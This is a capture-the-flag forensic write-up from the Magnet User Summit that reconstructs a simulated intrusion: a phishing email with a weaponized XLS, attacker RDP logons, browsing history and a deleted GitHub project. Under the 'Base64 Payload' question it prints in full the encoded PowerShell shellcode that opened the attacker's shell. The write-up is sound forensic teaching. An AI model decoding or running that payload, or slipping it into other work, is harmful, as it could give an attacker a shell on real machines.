Home Articles Magnet User Summit CTF: Intrusion

Magnet User Summit CTF: Intrusion

0
0
1,217

So, we decided to finish our write-up today. The forth part – the most interesting part. Intrusion! Again, no more AXIOM, only free and open source tools!

Method of Attack

What was the method of attack the threat actor used?

So, we started from Windows Event Logs analysis, and very soon found our favorite base64-encoded string in Windows PowerShell.evtx:

The event took place on 04/26/2018 16:01:39 (UTC). We decided to look for opened documents around that time as weaponized documents are common media in such attacks. Soon we found an LNK file indicating that EpochConversionExample.xls was opened on 04/26/2018 16:01:38. The document is located under C:\Users\maxpowers\Desktop\EpochConversionExample\. Let’s look inside:

Surprise! Ok, we have found weaponized document. It’s time to find its origin. So, it’s inside EpochConversionExample folder on the Desktop. Also, you can find an archive with the same name and… Zone.Identifier ADS:

[ZoneTransfer]

ZoneId=3

So, it was downloaded from the Internet. Where should we start? Emails or browsing history? Emails seem to be a better choice. Let’s look at mpowers@magnetic4nsics.com.ost located under C:\Users\maxpowers\AppData\Local\Microsoft\Outlook\. You can use SysTools OST Viewer to browse its contents. Let’s search for the attachment of interest. Here it is:

So, our victim got an archive with weaponized document via email, the flag is phishing.

Attack Email Address

What was the email address associated with the attacker?

As you can see on the last screenshot, the email is thanks2u2andu@gmail.com.

Malicious Document

What is the file name of the malicious document the attacker used?

Again, we already know that it’sĀ EpochConversionExample.xls.

Base64 Payload

What was the BASE64 payload that gave the attacker a shell? [BASE64 value]

As you have seen in the logs, the payload is:

pVZNj9s2EL37VxCGDjbWWlAS9eEYCyRtUCBAkQbdbXswfKAoqiuUlgSJzno37X8vZyRS1joBivQy5HCGb97MUKQ8Qe7I2+Vi/16pD8e26fRq+Zfsaqmi8LZQark+kPaUq0qQXnNtBnnWxk4+1PqT7sjvVadPXL1TqhGrce1pQ05Vrcl5HJ/H8WW9++44P3aSa/nwaIbCxjmNuJ83ZIo8zi5ijyuvox/7z6LT/yX2UR57qVfXyN+fVd40ytbuU9doKRy+at8VRSf7fsQvnu6rFzkqpfoon8YNG9Kc9LCs2lL9oorRYAgt3y68xnTWQPkPz60kvkkil917WVZ1paumJp4g/kd+lGT5R1VH4ZL4tdH6lgtJcOWnUy3Asyd+y/teP3anhXe+85o3b2Zdpxt6DiiFIRoGytY7sv/hWcv94eD1cMTouRTGIjMjshB86EwkILItuMQAFBgh0MDAkBsRDxGciihipgbOOQU1hGi0NCJPjWAc1hILX4KBA0AEIoG1FGYU98IshGgCuYAzLUCgCngS/MrQBo/TORfHFONGjimDWYDRgJ+MYC2zyAWIOHBQW0tjsEYOBQyBA4i4XUNr5AoxbPtK0t9MK0JQCJlCK0rYSyFGCn4lWKPcqiGzfhJmceaIZ9Y6EU8SxwoYsHzmHIjrLOmrPNwpYczCo4hzK7CNWLWY20pi0phRXDrBLXIA3ZLIBTKKQSSYJRZ2fljRkEKZUmcd8Ji1Yn/RBc8aTS1nPPzIBfPIQd261k4xQnAWzILGLi4aMlRz6zzgQQMSyIhy54znHnsU2rOBBuoyStF56/glNtorwb4yQyiJIZGBK/FEaJtaVvgtxAif2r1bCMnBL2W2b9PeDAReAGjFtNDKJKiZO3XuVknSzfWtwuczdk0Dq1FgxTPbywsa0GQ88kPBIHjkTjHOEJm5klBq851oxMmcCwYCwZEQxMBb76J0kTVM2wbi0f9gj4fBBZ/osm9Vbeo0ze2RwnZH805PhLApCZSJFdddjaUVuIa3wHBHlLbnqUOehIQEt/m1Ybi0IMvhm0ksA+EMOW7D7w0MPLzuB9Z0JLlblE1HVl51R3deRXwljdKL259l/ad+9IO1Wb25WZMv8AyOPwb74eU+rLzz7UNjlChcrW+8ar0hZuveqw4bEqzJ3/Be+/VJqd0/5nVWRTs81/A67hbeo+zk5eNqfws888Ox/w1RD+NDe6GHoP0qy8MFoHn/vReEmv01mVQ3BgwGat7ne8077d8rKVvi30vR1AUBdEr/BQ==

Decoded Imports

What two DLLs were imported in the base64 payload? [Comma separated with extensions]

Let’s look at the same log record again:

As you can see, the flag is kernel32.dll, msvcrt.dll.

First Login

What was the system time of the first login by the attacker? [UTC timestamp in the “YYYY-MM-DD hh:mm:ss” format]

To solve it, you need to analyze Windows Event Logs again. This timeĀ Microsoft-Windows-TerminalServices-LocalSessionManager%4Operational.evtx. We already know that the host ws compromised onĀ 04/26/2018 16:01:39 (UTC). So let’s start from this time and date. We see a few RDP logons and logoffs fromĀ 71.229.178.80, but than, at 04/26/2018 18:16:29 (UTC), a logon from 47.189.34.73:

So, the flag is 2018-04-26 18:16:29.

Gemini

What was the second account the attacker logged into?

So, according to the same log file, the host was accessed via RDP with itsupport user account too, but for some reason the flag is maxpowers.

After Exfil

What was the last website the attacker went to after logging in as Max Powers for the last time?

Let’s look at browsing history. For example, at History file located underĀ C:\Users\maxpowers\AppData\Local\Google\ChromeUser Data\Default\:

As you can see, the last record isĀ https://github.com/mpower4nsic/ProjectE/settings/delete, and the flag isĀ https://github.com.

What happened to project e?

What was the last thing that happened to Project E after the attacker logged into Max Powers github?

Let’s look at browsing history again – Project E was deleted.

That’s all! CTF is solved! Thanks for reading!

Happy forensicating!

About the authors

Oleg Skulkin, GCFA, MCFE, ACE, is a DFIR enthusional (enthusiast + professional),Ā Windows Forensics CookbookĀ andĀ Practical Mobile ForensicsĀ co-author.

Igor Mikhaylov, MCFE, EnCE, ACE, OSFCE, is a digital forensic examiner with more than 20 years of experience andĀ Mobile Forensics CookbookĀ author.

Load More Related Articles
Load More In Articles

Leave a Reply

Your email address will not be published. Required fields are marked *